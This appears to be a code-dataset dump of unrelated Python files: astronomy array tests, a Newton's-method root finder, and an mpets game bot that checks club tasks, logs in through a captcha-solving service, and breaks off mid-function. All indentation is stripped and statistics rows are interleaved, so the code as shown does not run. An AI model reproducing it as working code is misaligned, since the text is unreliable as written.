assert sca.yticks == pytest.approx(np.array([-0.75, -0.25, 0.25, 0.75]), 1e-3)
sca = scaled_array.ScaledSquarePixelArray(array=np.ones((6, 3)), pixel_scale=1.0)
assert sca.yticks == pytest.approx(np.array([-3.0, -1.0, 1.0, 3.0]), 1e-3)
sca = scaled_array.ScaledSquarePixelArray(array=np.ones((3, 1)), pixel_scale=1.0)
assert sca.yticks == pytest.approx(np.array([-1.5, -0.5, 0.5, 1.5]), 1e-3)
def test__square_pixel_grid__xticks(self):
sca = scaled_array.ScaledSquarePixelArray(array=np.ones((3, 3)), pixel_scale=1.0)
assert sca.xticks == pytest.approx(np.array([-1.5, -0.5, 0.5, 1.5]), 1e-3)
sca = scaled_array.ScaledSquarePixelArray(array=np.ones((3, 3)), pixel_scale=0.5)
assert sca.xticks == pytest.approx(np.array([-0.75, -0.25, 0.25, 0.75]), 1e-3)
sca = scaled_array.ScaledSquarePixelArray(array=np.ones((3, 6)), pixel_scale=1.0)
assert sca.xticks == pytest.approx(np.array([-3.0, -1.0, 1.0, 3.0]), 1e-3)
sca = scaled_array.ScaledSquarePixelArray(array=np.ones((1, 3)), pixel_scale=1.0)
assert sca.xticks == pytest.approx(np.array([-1.5, -0.5, 0.5, 1.5]), 1e-3)
def test__rectangular_pixel_grid__yticks(self):
sca = scaled_array.ScaledRectangularPixelArray(array=np.ones((3, 3)), pixel_scales=(1.0, 5.0))
assert sca.yticks == pytest.approx(np.array([-1.5, -0.5, 0.5, 1.5]), 1e-3)
sca = scaled_array.ScaledRectangularPixelArray(array=np.ones((3, 3)), pixel_scales=(0.5, 5.0))
assert sca.yticks == pytest.approx(np.array([-0.75, -0.25, 0.25, 0.75]), 1e-3)
sca = scaled_array.ScaledRectangularPixelArray(array=np.ones((6, 3)), pixel_scales=(1.0, 5.0))
assert sca.yticks == pytest.approx(np.array([-3.0, -1.0, 1.0, 3.0]), 1e-3)
sca = scaled_array.ScaledRectangularPixelArray(array=np.ones((3, 6)), pixel_scales=(1.0, 5.0))
assert sca.yticks == pytest.approx(np.array([-1.5, -0.5, 0.5, 1.5]), 1e-3)
def test__rectangular_pixel_grid__xticks(self):
sca = scaled_array.ScaledRectangularPixelArray(array=np.ones((3, 3)), pixel_scales=(5.0, 1.0))
assert sca.xticks == pytest.approx(np.array([-1.5, -0.5, 0.5, 1.5]), 1e-3)
sca = scaled_array.ScaledRectangularPixelArray(array=np.ones((3, 3)), pixel_scales=(5.0, 0.5))
assert sca.xticks == pytest.approx(np.array([-0.75, -0.25, 0.25, 0.75]), 1e-3)
sca = scaled_array.ScaledRectangularPixelArray(array=np.ones((3, 6)), pixel_scales=(5.0, 1.0))
assert sca.xticks == pytest.approx(np.array([-3.0, -1.0, 1.0, 3.0]), 1e-3)
sca = scaled_array.ScaledRectangularPixelArray(array=np.ones((6, 3)), pixel_scales=(5.0, 1.0))
assert sca.xticks == pytest.approx(np.array([-1.5, -0.5, 0.5, 1.5]), 1e-3)
class TestArray:
class TestResizing:
def test__pad__compare_to_imaging_util(self):
array = np.ones((5, 5))
array[2, 2] = 2.0
array = scaled_array.ScaledSquarePixelArray(array, pixel_scale=1.0)
modified = array.resized_scaled_array_from_array(new_shape=(7, 7), new_centre_pixels=(1, 1))
modified_util = array_util.resize_array_2d(array_2d=array, new_shape=(7, 7), origin=(1, 1))
assert type(modified) == scaled_array.ScaledSquarePixelArray
assert (modified == modified_util).all()
assert modified.pixel_scale == 1.0
def test__trim__compare_to_imaging_util(self):
array = np.ones((5, 5))
array[2, 2] = 2.0
array = scaled_array.ScaledSquarePixelArray(array, pixel_scale=1.0)
modified = array.resized_scaled_array_from_array(new_shape=(3, 3), new_centre_pixels=(4, 4))
modified_util = array_util.resize_array_2d(array_2d=array, new_shape=(3, 3), origin=(4, 4))
assert type(modified) == scaled_array.ScaledSquarePixelArray
assert (modified == modified_util).all()
assert modified.pixel_scale == 1.0
def test__new_centre_is_in_arc_seconds(self):
array = np.ones((5, 5))
array[2, 2] = 2.0
array = scaled_array.ScaledSquarePixelArray(array, pixel_scale=3.0)
modified = array.resized_scaled_array_from_array(new_shape=(3, 3), new_centre_arc_seconds=(6.0, 6.0))
modified_util = array_util.resize_array_2d(array_2d=array, new_shape=(3, 3), origin=(0, 4))
assert (modified == modified_util).all()
modified = array.resized_scaled_array_from_array(new_shape=(3, 3), new_centre_arc_seconds=(7.49, 4.51))
modified_util = array_util.resize_array_2d(array_2d=array, new_shape=(3, 3), origin=(0, 4))
assert (modified == modified_util).all()
modified = array.resized_scaled_array_from_array(new_shape=(3, 3), new_centre_arc_seconds=(7.49, 7.49))
modified_util = array_util.resize_array_2d(array_2d=array, new_shape=(3, 3), origin=(0, 4))
assert (modified == modified_util).all()
modified = array.resized_scaled_array_from_array(new_shape=(3, 3), new_centre_arc_seconds=(4.51, 4.51))
modified_util = array_util.resize_array_2d(array_2d=array, new_shape=(3, 3), origin=(0, 4))
assert (modified == modified_util).all()
modified = array.resized_scaled_array_from_array(new_shape=(3, 3), new_centre_arc_seconds=(4.51, 7.49))
modified_util = array_util.resize_array_2d(array_2d=array, new_shape=(3, 3), origin=(0, 4))
assert (modified == modified_util).all()
class TestScaledSquarePixelArray:
class TestConstructors(object):
def test__constructor(self, array_grid):
# Does the array grid class correctly instantiate as an instance of ndarray?
assert array_grid.shape == (5, 5)
assert array_grid.pixel_scale == 0.5
assert isinstance(array_grid, np.ndarray)
assert isinstance(array_grid, scaled_array.ScaledSquarePixelArray)
def test__init__input_data_grid_single_value__all_attributes_correct_including_data_inheritance(self):
data_grid = scaled_array.ScaledSquarePixelArray.single_value(value=5.0, shape=(3, 3),
pixel_scale=1.0, origin=(1.0, 1.0))
assert (data_grid == 5.0 * np.ones((3, 3))).all()
assert data_grid.pixel_scale == 1.0
assert data_grid.shape == (3, 3)
assert data_grid.central_pixel_coordinates == (1.0, 1.0)
assert data_grid.shape_arc_seconds == pytest.approx((3.0, 3.0))
assert data_grid.origin == (1.0, 1.0)
def test__from_fits__input_data_grid_3x3__all_attributes_correct_including_data_inheritance(self):
data_grid = scaled_array.ScaledSquarePixelArray.from_fits_with_pixel_scale(file_path=test_data_dir + '3x3_ones.fits', hdu=0,
pixel_scale=1.0, origin=(1.0, 1.0))
assert (data_grid == np.ones((3, 3))).all()
assert data_grid.pixel_scale == 1.0
assert data_grid.shape == (3, 3)
assert data_grid.central_pixel_coordinates == (1.0, 1.0)
assert data_grid.shape_arc_seconds == pytest.approx((3.0, 3.0))
assert data_grid.origin == (1.0, 1.0)
def test__from_fits__input_data_grid_4x3__all_attributes_correct_including_data_inheritance(self):
data_grid = scaled_array.ScaledSquarePixelArray.from_fits_with_pixel_scale(file_path=test_data_dir + '4x3_ones.fits', hdu=0,
pixel_scale=0.1)
assert (data_grid == np.ones((4, 3))).all()
assert data_grid.pixel_scale == 0.1
assert data_grid.shape == (4, 3)
assert data_grid.central_pixel_coordinates == (1.5, 1.0)
assert data_grid.shape_arc_seconds == pytest.approx((0.4, 0.3))
def test__zero_or_negative_pixel_scale__raises_exception(self):
with pytest.raises(exc.ScaledArrayException):
scaled_array.ScaledSquarePixelArray(array=np.ones((2,2)), pixel_scale=0.0)
with pytest.raises(exc.ScaledArrayException):
scaled_array.ScaledSquarePixelArray(array=np.ones((2,2)), pixel_scale=-0.5)
class TestExtract:
def test__mask_extract_2d_array__uses_the_limits_of_the_mask(self):
array = np.array([[ 1.0, 2.0, 3.0, 4.0],
[ 5.0, 6.0, 7.0, 8.0],
[ 9.0, 10.0, 11.0, 12.0],
[13.0, 14.0, 15.0, 16.0]])
array = scaled_array.ScaledSquarePixelArray(array=array, pixel_scale=1.0)
mask = msk.Mask(array=np.array([[True, True, True, True],
[True, False, False, True],
[True, False, False, True],
[True, True, True, True]]), pixel_scale=1.0)
array_extracted = array.extract_scaled_array_around_mask(mask=mask, buffer=0)
assert (array_extracted == np.array([[6.0, 7.0],
[10.0, 11.0]])).all()
mask = msk.Mask(array=np.array([[True, True, True, True],
[True, False, False, True],
[True, False, False, False],
[True, True, True, True]]), pixel_scale=1.0)
array_extracted = array.extract_scaled_array_around_mask(mask=mask, buffer=0)
assert (array_extracted == np.array([[6.0, 7.0, 8.0],
[10.0, 11.0, 12.0]])).all()
mask = msk.Mask(array=np.array([[True, True, True, True],
[True, False, False, True],
[True, False, False, True],
[True, True, False, True]]), pixel_scale=1.0)
array_extracted = array.extract_scaled_array_around_mask(mask=mask, buffer=0)
assert (array_extracted == np.array([[6.0, 7.0],
[10.0, 11.0],
[14.0, 15.0]])).all()
mask = msk.Mask(array=np.array([[True, True, True, True],
[True, False, False, True],
[False, False, False, True],
[True, True, True, True]]), pixel_scale=1.0)
array_extracted = array.extract_scaled_array_around_mask(mask=mask, buffer=0)
assert (array_extracted == np.array([[5.0, 6.0, 7.0],
[9.0, 10.0, 11.0]])).all()
mask = msk.Mask(array=np.array([[True, False, True, True],
[True, False, False, True],
[True, False, False, True],
[True, True, True, True]]), pixel_scale=1.0)
array_extracted = array.extract_scaled_array_around_mask(mask=mask, buffer=0)
assert (array_extracted == np.array([[2.0, 3.0],
[6.0, 7.0],
[10.0, 11.0]])).all()
mask = msk.Mask(array=np.array([[True, True, True, True],
[True, False, False, True],
[True, False, False, True],
[True, True, True, True]]), pixel_scale=1.0)
array_extracted = array.extract_scaled_array_around_mask(mask=mask, buffer=1)
assert (array_extracted == np.array([[ 1.0, 2.0, 3.0, 4.0],
[ 5.0, 6.0, 7.0, 8.0],
[ 9.0, 10.0, 11.0, 12.0],
[13.0, 14.0, 15.0, 16.0]])).all()
# class TestBinnedUpArray:
#
# def test__bin_up_size_is_1__returned_array_has_same_dimensions(self):
class TestScaledRectangularPixelArray:
class TestConstructors(object):
def test__init__input_data_grid_single_value__all_attributes_correct_including_data_inheritance(self):
data_grid = scaled_array.ScaledRectangularPixelArray.single_value(value=5.0, shape=(3, 3),
pixel_scales=(2.0, 1.0), origin=(1.0, 1.0))
assert (data_grid == 5.0 * np.ones((3, 3))).all()
assert data_grid.pixel_scales == (2.0, 1.0)
assert data_grid.shape == (3, 3)
assert data_grid.central_pixel_coordinates == (1.0, 1.0)
assert data_grid.shape_arc_seconds == pytest.approx((6.0, 3.0))
assert data_grid.origin == (1.0, 1.0)
def test__from_fits__input_data_grid_3x3__all_attributes_correct_including_data_inheritance(self):
data_grid = scaled_array.ScaledRectangularPixelArray.from_fits_with_pixel_scale(
file_path=test_data_dir + '3x3_ones.fits', hdu=0, pixel_scales=(2.0, 1.0), origin=(1.0, 1.0))
assert data_grid == pytest.approx(np.ones((3, 3)), 1e-4)
assert data_grid.pixel_scales == (2.0, 1.0)
assert data_grid.shape == (3, 3)
assert data_grid.central_pixel_coordinates == (1.0, 1.0)
assert data_grid.shape_arc_seconds == pytest.approx((6.0, 3.0))
assert data_grid.origin == (1.0, 1.0)
def test__from_fits__input_data_grid_4x3__all_attributes_correct_including_data_inheritance(self):
data_grid = scaled_array.ScaledRectangularPixelArray.from_fits_with_pixel_scale(
file_path=test_data_dir + '4x3_ones.fits', hdu=0, pixel_scales=(0.2, 0.1))
assert data_grid == pytest.approx(np.ones((4, 3)), 1e-4)
assert data_grid.pixel_scales == (0.2, 0.1)
assert data_grid.shape == (4, 3)
assert data_grid.central_pixel_coordinates == (1.5, 1.0)
assert data_grid.shape_arc_seconds == pytest.approx((0.8, 0.3))
def test__zero_or_negative_pixel_scale__raises_exception(self):
with pytest.raises(exc.ScaledArrayException):
scaled_array.ScaledRectangularPixelArray(array=np.ones((2,2)), pixel_scales=(0.0, 0.5))
with pytest.raises(exc.ScaledArrayException):
scaled_array.ScaledRectangularPixelArray(array=np.ones((2,2)), pixel_scales=(0.5, 0.0))
with pytest.raises(exc.ScaledArrayException):
scaled_array.ScaledRectangularPixelArray(array=np.ones((2,2)), pixel_scales=(-0.5, 0.5))
with pytest.raises(exc.ScaledArrayException):
scaled_array.ScaledRectangularPixelArray(array=np.ones((2,2)), pixel_scales=(0.5, -0.5)) | 55.878173 | 141 | 0.604492 | 6,082 | 44,032 | 4.030582 | 0.027951 | 0.01493 | 0.097903 | 0.055642 | 0.956148 | 0.942645 | 0.920209 | 0.914008 | 0.900261 | 0.882557 | 0 | 0.067098 | 0.270258 | 44,032 | 788 | 142 | 55.878173 | 0.695817 | 0.003929 | 0 | 0.545794 | 0 | 0 | 0.002508 | 0.001095 | 0 | 0 | 0 | 0 | 0.392523 | 1 | 0.08785 | false | 0 | 0.013084 | 0.003738 | 0.128972 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
# File: sublimeText3/Packages/SublimeCodeIntel/libs/codeintel2/pythoncile.py (MoAnsir/dot_file_2017)
import os
from codeintel2.pythoncile1 import *
# File: models/imagenet/__init__.py (mathczh/GANL2L)
from __future__ import absolute_import
# from .cnn import *
from .resnet import *
# from .orthresnet import *
# File: 105torus_2017/torus_newton.py (ltabis/epitech-projects)
#!/usr/bin/python3
from sys import *
def do_newton(tab, n):
    # Coefficients a0..a4 of p(x) = a4*x^4 + a3*x^3 + a2*x^2 + a1*x + a0,
    # read from tab[1]..tab[5].
    a0, a1, a2, a3, a4 = (float(tab[i]) for i in range(1, 6))

    def step(x):
        # One Newton iteration: x - p(x) / p'(x).
        p = a4 * x**4 + a3 * x**3 + a2 * x**2 + a1 * x + a0
        dp = 4 * a4 * x**3 + 3 * a3 * x**2 + 2 * a2 * x + a1
        return x - p / dp

    xn = 0.5
    xn1 = step(xn)
    print("x = " + str(xn))
    if xn != xn1:
        print("x = {1:.{0}f}".format(n, xn1))
    # Iterate until the relative change drops below 10**-n.
    while (abs(xn1 - xn) / abs(xn1)) > 10**-n:
        xn = xn1
        xn1 = step(xn)
        if str(xn) != str(xn1):
            print("x = {1:.{0}f}".format(n, xn1))
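The polynomial and its derivative can also be evaluated together in one pass with Horner's scheme; a minimal sketch (`poly_and_deriv` is a hypothetical helper, with coefficients ordered a0..an as read from `tab[1:6]`):

```python
def poly_and_deriv(coeffs, x):
    """Evaluate p(x) and p'(x) in one pass (Horner's scheme).

    coeffs is [a0, a1, ..., an] for p(x) = a0 + a1*x + ... + an*x**n.
    """
    p, dp = 0.0, 0.0
    for a in reversed(coeffs):
        dp = dp * x + p  # derivative of the partial polynomial built so far
        p = p * x + a
    return p, dp
```

For example, with p(x) = x**4 - 1, `poly_and_deriv([-1, 0, 0, 0, 1], 2.0)` gives `(15.0, 32.0)`.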
# File: utils/tasks.py (Wilidon/mpetsbot)
import asyncio
import random
import time
import traceback
from datetime import datetime
from loguru import logger
from python_rucaptcha import ImageCaptcha
from config import get_settings, get_db
from mpets import MpetsApi
from sql import crud
from utils import functions
from utils.constants import gifts_name, holiday_1402, holiday_2302, holiday_1402_prizes, holiday_2302_prizes, \
holiday_308, holiday_308_prizes, holiday_401, holiday_401_prizes, holiday_501, holiday_501_prizes
from utils.functions import get_mpets_api, notice
async def check_task(user, user_task, progress, task_name):
if user_task.end <= progress:
crud.update_club_task(id=user_task.id,
progress=user_task.end,
status="completed")
await functions.add_club_points(user_id=user.user_id,
club_id=user.club_id,
task_name=task_name)
else:
crud.update_club_task(user_task.id, progress)
async def checking_coin_task(mpets, user, user_task):
pet = await mpets.view_profile(user.pet_id)
if not pet["status"]:
# logging
return 0
if pet["club_coin"] is None:
# logging
return 0
progress = int(pet["club_coin"])
await check_task(user, user_task, progress, user_task.task_name)
async def checking_heart_task(mpets, user, user_task):
page, progress, step, counter = 1, 0, True, 0
while step:
try:
pets = await mpets.club_budget_history_all(
user.club_id, 2, page)
if not pets["players"]:
break
for pet in pets["players"]:
if pet["pet_id"] == user.pet_id:
progress = int(pet["count"])
step = False
break
page += 1
except Exception:
counter += 1
if counter >= 5:
return 0
await check_task(user, user_task, progress, user_task.task_name)
async def checking_exp_task(mpets, user, user_task):
page, progress, step, counter = 1, 0, True, 0
while step:
try:
pets = await mpets.club_budget_history_all(
user.club_id, 3, page)
if not pets["players"]:
break
for pet in pets["players"]:
if pet["pet_id"] == user.pet_id:
progress = int(pet["count"])
step = False
break
page += 1
except Exception:
counter += 1
if counter >= 5:
return 0
await check_task(user, user_task, progress, user_task.task_name)
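checking_heart_task and checking_exp_task above differ only in the budget-history type they request; the per-page lookup itself is pure and could be shared. A sketch under that assumption (`find_pet_count` is a hypothetical name; it takes the already-fetched player pages):

```python
def find_pet_count(pages, pet_id):
    """Return the 'count' recorded for pet_id in paginated player lists
    (as returned by club_budget_history_all), or 0 if the pet is absent."""
    for players in pages:
        for pet in players:
            if pet["pet_id"] == pet_id:
                return int(pet["count"])
    return 0
```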
async def checking_getGift_task(mpets, user, user_task):
gift_id = user_task.task_name.split("_")[-1]
pet_gift = False
if gift_id.isdigit() is False:
return 0
gifts = await mpets.view_gifts(user.pet_id)
if int(gift_id) == 0:
for gift in gifts["players"]:
if "сегодня" in gift["date"]:
pet_gift = True
if pet_gift:
await check_task(user, user_task, user_task.end, user_task.task_name)
else:
gift_id = int(gifts_name[int(gift_id) - 1][0])
for gift in gifts["players"]:
if gift_id in [26, 27, 35]:
if gift["pet_id"]:
try:
if "сегодня" in gift["date"] and \
(int(gift["present_id"]) == 36 or
int(gift["present_id"]) == 26):
pet_gift = True
elif "сегодня" in gift["date"] and \
(int(gift["present_id"]) == 37 or
int(gift["present_id"]) == 27):
pet_gift = True
elif "сегодня" in gift["date"] and \
(int(gift["present_id"]) == 35 or
int(gift["present_id"]) == 38):
pet_gift = True
except Exception:
pass
else:
if gift["pet_id"]:
try:
if "сегодня" in gift["date"] and \
int(gift["present_id"]) == int(gift_id):
pet_gift = True
except Exception:
pass
if pet_gift:
await check_task(user, user_task, user_task.end, user_task.task_name)
async def checking_sendGift_task(mpets, user, user_task, pet_id):
gift_id = user_task.task_name.split("_")[-1]
pet_gift = False
if gift_id.isdigit() is False:
return 0
gifts = await mpets.view_gifts(pet_id)
if int(gift_id) == 0:
for gift in gifts["players"]:
if gift["pet_id"]:
try:
if user.pet_id == int(gift["pet_id"]) and \
"сегодня" in gift["date"]:
pet_gift = True
except Exception:
pass
if pet_gift:
await check_task(user, user_task, user_task.end, user_task.task_name)
return True
else:
gift_id = int(gifts_name[int(gift_id) - 1][0])
for gift in gifts["players"]:
if gift_id in [26, 27, 35]:
if gift["pet_id"]:
try:
if "сегодня" in gift["date"] and \
(int(gift["present_id"]) == 36 or
int(gift["present_id"]) == 26) and \
user.pet_id == int(gift["pet_id"]):
pet_gift = True
elif "сегодня" in gift["date"] and \
(int(gift["present_id"]) == 37 or
int(gift["present_id"]) == 27) and \
user.pet_id == int(gift["pet_id"]):
pet_gift = True
elif "сегодня" in gift["date"] and \
(int(gift["present_id"]) == 35 or
int(gift["present_id"]) == 38) and \
user.pet_id == int(gift["pet_id"]):
pet_gift = True
except Exception:
pass
else:
if gift["pet_id"]:
try:
if "сегодня" in gift["date"] and \
int(gift["present_id"]) == gift_id and \
user.pet_id == int(gift["pet_id"]):
pet_gift = True
except Exception:
pass
if pet_gift:
await check_task(user, user_task, user_task.end, user_task.task_name)
return True
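The triple elif chains in the two gift tasks above treat present ids 26/27/35 and 36/37/38 as one interchangeable group; that comparison could be a small predicate. A sketch mirroring the checks as written (`gift_matches` and `PAIRED_GIFTS` are hypothetical names):

```python
PAIRED_GIFTS = {26, 27, 35, 36, 37, 38}

def gift_matches(present_id, wanted_id):
    # Ids 26/27/35 accept any member of the paired group, matching the
    # elif chains above; every other id must match exactly.
    if wanted_id in {26, 27, 35}:
        return int(present_id) in PAIRED_GIFTS
    return int(present_id) == wanted_id
```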
async def checking_chat_task(mpets, user, user_task):
today = int(datetime.today().strftime("%Y%m%d"))
chat = await mpets.chat(user.club_id)
for msg in chat["messages"]:
if crud.get_chat_message(user.club_id, user.pet_id, msg["message"],
today):
crud.update_club_task(user_task.id, user_task.end,
"completed")
await functions.add_club_points(user.user_id, user.club_id)
else:
if crud.get_chat_message(user.club_id, msg["pet_id"],
msg["message"], today) is None:
crud.create_chat_message(user.club_id, msg["pet_id"],
msg["message"], today)
async def checking_thread_task(mpets, user, user_task):
forums = await mpets.forums(user.club_id)
if forums["status"] == "error":
# logging
return False
progress = user_task.progress
for i in range(0, 2):
threads = await mpets.threads(forums["forums_id"][i]["forum_id"])
if threads["status"] != "ok":
continue
for thread in threads["threads"]:
page = 1
thread_data = crud.get_thread_messages(thread)
if not thread_data:
while True:
thread_info = await mpets.thread(thread, page)
if thread_info["status"] == "error":
break
for thread_msg in thread_info["messages"]:
crud.create_thread_message(user.club_id,
thread_msg["pet_id"],
thread,
thread_msg["message"],
page,
thread_msg["post_date"])
if user.pet_id == int(thread_msg["pet_id"]):
progress += 1
page += 1
else:
page = crud.get_last_page_thread(thread).page
page = int(page)
while True:
thread_info = await mpets.thread(thread, page)
if thread_info["status"] == "error":
break
for thread_msg in thread_info["messages"]:
if crud.check_msg(thread, thread_msg["message"],
thread_msg["post_date"],
page) is None:
crud.create_thread_message(user.club_id,
thread_msg["pet_id"],
thread,
thread_msg["message"],
page,
thread_msg["post_date"])
if user.pet_id == int(thread_msg["pet_id"]):
progress += 1
page += 1
if user_task.end <= progress:
crud.update_club_task(user_task.id, user_task.end,
"completed")
await functions.add_club_points(user.user_id, user.club_id)
else:
crud.update_club_task(user_task.id, progress)
async def checking_upRank_task(mpets, user, user_task):
history = await mpets.club_history(user.club_id)
today = datetime.today().strftime("%d.%m")
if not history["status"]:
# logging
return False
progress = user_task.progress
for his in history["history"]:
if user.pet_id == int(his["owner_id"]) and \
" повысил " in his["action"] and \
today == his["date"].split(" ")[0]:
progress += 1
await check_task(user, user_task, progress, user_task.task_name)
async def checking_downRank_task(mpets, user, user_task):
history = await mpets.club_history(user.club_id)
today = datetime.today().strftime("%d.%m")
if not history["status"]:
# logging
return False
progress = user_task.progress
for his in history["history"]:
if user.pet_id == int(his["owner_id"]) and \
" понизил " in his["action"] and \
today == his["date"].split(" ")[0]:
progress += 1
await check_task(user, user_task, progress, user_task.task_name)
async def checking_acceptPlayer_task(mpets, user, user_task):
history = await mpets.club_history(user.club_id)
today = datetime.today().strftime("%d.%m")
if not history["status"]:
# logging
return 0
progress = user_task.progress
for his in history["history"]:
if user.pet_id == int(his["owner_id"]) and \
"принял" in his["action"] and \
today == his["date"].split(" ")[0]:
progress += 1
await check_task(user, user_task, progress, user_task.task_name)
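checking_upRank_task, checking_downRank_task and checking_acceptPlayer_task all count today's club-history entries by owner and action keyword; the counting step is pure and could be one helper. A sketch (`count_history_actions` is a hypothetical name; the Russian keywords are the exact substrings the game emits):

```python
def count_history_actions(history, pet_id, keyword, today):
    """Count history entries made by pet_id whose action contains keyword
    and whose date ('dd.mm hh:mm') falls on today ('dd.mm')."""
    return sum(
        1
        for entry in history
        if int(entry["owner_id"]) == pet_id
        and keyword in entry["action"]
        and entry["date"].split(" ")[0] == today
    )
```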
async def start_verify_club(club, mpets):
try:
today = int(datetime.today().strftime("%Y%m%d"))
profile = await mpets.profile()
if profile["club"] is None:
            logger.info(f"{club.bot_name} was excluded from club ({club.club_id}).")
crud.update_club_status(club.club_id, "excluded")
users = crud.get_users_with_club(club.club_id)
for user in users:
user_tasks = crud.get_club_tasks(user.user_id, today)
profile = await mpets.view_profile(user.pet_id)
if profile["club_id"] is None:
continue
            if int(profile["club_id"]) != club.club_id:
                # The pet is no longer in this club; skip it rather than
                # abort the remaining users.
                continue
for user_task in user_tasks:
try:
if user_task.status == "completed":
continue
elif user_task.task_name == "coin":
await checking_coin_task(mpets, user, user_task)
elif user_task.task_name == "heart":
await checking_heart_task(mpets, user, user_task)
elif user_task.task_name == "exp":
await checking_exp_task(mpets, user, user_task)
elif "get_gift" in user_task.task_name or \
"get_random_gift" in user_task.task_name:
await checking_getGift_task(mpets, user, user_task)
elif user_task.task_name == "chat":
await checking_chat_task(mpets, user, user_task)
elif user_task.task_name == "thread":
pass
# await checking_thread_task(mpets, user, user_task)
elif user_task.task_name == "upRank":
await checking_upRank_task(mpets, user, user_task)
elif user_task.task_name == "downRank":
await checking_downRank_task(mpets, user, user_task)
elif user_task.task_name == "acceptPlayer":
await checking_acceptPlayer_task(mpets, user, user_task)
except Exception as e:
log = logger.bind(context=e)
log.error(f"Не удалось задание у клуба({club.club_id})"
f"пользователь {user.user_id}"
f"ошибка {e}")
except Exception as e:
log = logger.bind(context=traceback.format_exc())
log.error(f"Не удалось проверить клуб({club.club_id}) \n")
async def start_verify_account(club, mpets):
profile = await mpets.profile()
if profile and not profile["status"]:
log = logger.bind(context=profile)
log.warning("Не удалось получить профиль.")
return False
if profile["club"] is not None:
crud.update_club_last_active(club_id=club.club_id)
logger.success(f"Клуб ({club.club_id}) подтвержден.")
crud.update_club_status(club.club_id, "ok")
async def checking_bots():
logger.debug("start checking_bots")
settings = get_settings()
while True:
try:
clubs_with_status_ok = crud.get_clubs(status="ok")
clubs_with_status_waiting = crud.get_clubs(status="waiting")
clubs_with_status_freeze = crud.get_clubs(status="freeze")
tasks = []
time0 = time.time()
for i in range(0, len(clubs_with_status_ok)):
club = clubs_with_status_ok[i]
mpets = await get_mpets_api(club=club, api_key=settings.api_key)
task = asyncio.create_task(start_verify_club(club,
mpets))
tasks.append(task)
if len(tasks) >= 20:
await asyncio.gather(*tasks)
await asyncio.sleep(1)
tasks = []
elif i + 1 == len(clubs_with_status_ok):
await asyncio.gather(*tasks)
await asyncio.sleep(1)
tasks = []
for i in range(0, len(clubs_with_status_waiting)):
club = clubs_with_status_waiting[i]
mpets = await get_mpets_api(club=club, api_key=settings.api_key)
if mpets is False:
crud.update_club_status(club_id=club.club_id,
status="excluded")
task = asyncio.create_task(start_verify_account(club, mpets))
tasks.append(task)
if len(tasks) >= 20:
await asyncio.gather(*tasks)
await asyncio.sleep(1)
tasks = []
elif i + 1 == len(clubs_with_status_waiting):
await asyncio.gather(*tasks)
await asyncio.sleep(1)
tasks = []
for i in range(0, len(clubs_with_status_freeze)):
club = clubs_with_status_freeze[i]
crud.update_club_last_active(club_id=club.club_id, difference=86400)
mpets = await get_mpets_api(club=club, api_key=settings.api_key)
if mpets is False:
crud.update_club_status(club_id=club.club_id,
status="excluded")
task = asyncio.create_task(start_verify_account(club, mpets))
tasks.append(task)
if len(tasks) >= 20:
await asyncio.gather(*tasks)
await asyncio.sleep(1)
tasks = []
elif i + 1 == len(clubs_with_status_freeze):
await asyncio.gather(*tasks)
await asyncio.sleep(1)
tasks = []
total_time = int(time.time() - time0)
crud.health(clubtasks=total_time)
await asyncio.sleep(1)
except Exception as e:
# raise
logger.error(e)
await asyncio.sleep(10)
async def update_user_data():
logger.debug("start update_user_data")
settings = get_settings()
mpets = MpetsApi(name=settings.bot1,
password=settings.bot_password,
rucaptcha_api=settings.api_key)
r = await mpets.login()
logger.bind(context=r).success("Функция обновления данных пользователей "
"запущена.")
while True:
try:
time0 = time.time()
users = crud.get_users()
for user in users:
if user.pet_id == 0:
continue
profile = await mpets.view_profile(user.pet_id)
if not profile['status']:
log = logger.bind(context=profile)
log.warning(f"Не удалось обновить информацию "
f"пользователя {user.user_id}")
continue
user = crud.get_user(user.user_id)
if user.club_id is not None:
if profile["club_id"] is None:
crud.reset_user_stats(user.user_id)
stats = crud.get_user_stats(user.user_id)
logger.warning(f"Сбросил статистику пользователя "
f"{user.user_id}. У него было "
f"{stats.club_tasks} ёлок и "
f"{stats.club_points} фишек.")
elif int(user.club_id) != int(profile["club_id"]):
crud.reset_user_stats(user.user_id)
stats = crud.get_user_stats(user.user_id)
logger.warning(f"Сбросил статистику пользователя "
f"{user.user_id}. У него было "
f"{stats.club_tasks} ёлок и "
f"{stats.club_points} фишек.")
crud.update_user_data(user.user_id, profile["pet_id"],
profile["name"], profile["club_id"])
total_time = int(time.time() - time0)
crud.health(userinfo=total_time)
await asyncio.sleep(3600)
except Exception as e:
logger.error(e)
await asyncio.sleep(3)
async def checking_avatar_task(mpets, user, user_task):
profile = await mpets.view_profile(user.pet_id)
if not profile["status"]:
return 0
task_name = user_task.task_name
avatar_id = user_task.task_name.split("_")[-1]
avatar_id = avatar_id.rsplit(":", maxsplit=1)[0]
if int(functions.avatar_name[int(avatar_id)][0]) == int(profile["ava_id"]):
ava = task_name.split("_", maxsplit=1)[-1]
start_time = ava.rsplit(":", maxsplit=1)[1]
if int(start_time) == 0:
task_name = f"avatar_{avatar_id}:{int(time.time())}"
crud.update_user_task_name(user_task.id, task_name)
else:
left_time = time.time() - int(start_time)
if left_time >= 3600:
crud.update_user_task(user_task.id, user_task.end, "completed")
await functions.add_user_points(user_id=user.user_id,
task_name="avatar")
else:
left_time = int(left_time // 60)
crud.update_user_task(user_task.id, left_time, "waiting")
else:
task_name = f"avatar_{avatar_id}:0"
crud.update_user_task(user_task.id, 0, "waiting")
crud.update_user_task_name(user_task.id, task_name)
async def checking_anketa_task(mpets, user, user_task):
profile = await mpets.view_anketa(user.pet_id)
if not profile["status"]:
return 0
task_name = user_task.task_name
anketa_about = task_name.split("_", maxsplit=1)[-1]
anketa_about = anketa_about.rsplit(":", maxsplit=1)[0]
if anketa_about != profile["about"]:
ank = task_name.split("_", maxsplit=1)[-1]
start_time = ank.rsplit(":", maxsplit=1)[1]
if int(start_time) == 0:
task_name = f"anketa_{anketa_about}:{int(time.time())}"
crud.update_user_task_name(user_task.id, task_name)
else:
left_time = time.time() - int(start_time)
if left_time >= 1800:
crud.update_user_task(user_task.id, user_task.end, "completed")
await functions.add_user_points(user_id=user.user_id,
task_name="anketa")
else:
left_time = int(left_time // 60)
